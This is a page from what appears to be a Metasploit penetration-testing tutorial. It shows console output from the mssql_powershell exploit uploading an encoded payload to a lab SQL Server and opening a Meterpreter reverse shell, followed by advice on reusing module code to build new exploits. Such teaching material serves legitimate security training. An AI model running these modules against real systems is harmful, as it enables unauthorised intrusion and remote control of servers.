196
Chapter 13
RHOST => 172.16.32.136
msf exploit(mssql_powershell) >
exploit
[*] Started reverse handler on 172.16.32.129:4444
[*] Warning: This module will leave CztBAnfG.exe in the SQL Server %TEMP% directory
[*] Uploading the payload CztBAnfG, please be patient...
[*] Converting the payload utilizing PowerShell EncodedCommand...
[*] Executing the payload...
[*] Sending stage (748032 bytes) to 172.16.32.136
[*] Be sure to cleanup CztBAnfG.exe...
[*] Meterpreter session 1 opened (172.16.32.129:4444 -> 172.16.32.136:49164) at 2010-05-17 16:12:19 -0400
meterpreter >
The Power of Code Reuse
This process of leveraging existing code, tweaking it, and adding in some
original code is one of the most powerful things we can do with Metasploit.
You have no reason to start from scratch in most situations after you have a
feel for the Framework and you take a look at how existing code works. Because
this module was essentially built for you, you can get more practice by going
through other Metasploit modules and seeing what they are doing and how
they work. You’ll start to learn the basics of buffer overflows and how they are
created. Notice how the code is structured and how it works, and then create
your own exploits from scratch. If you’re not familiar with the Ruby programming
language or if this chapter was a bit over your head, pick up a book and
read and learn. The best way to learn how to develop these types of modules
is through trial and error.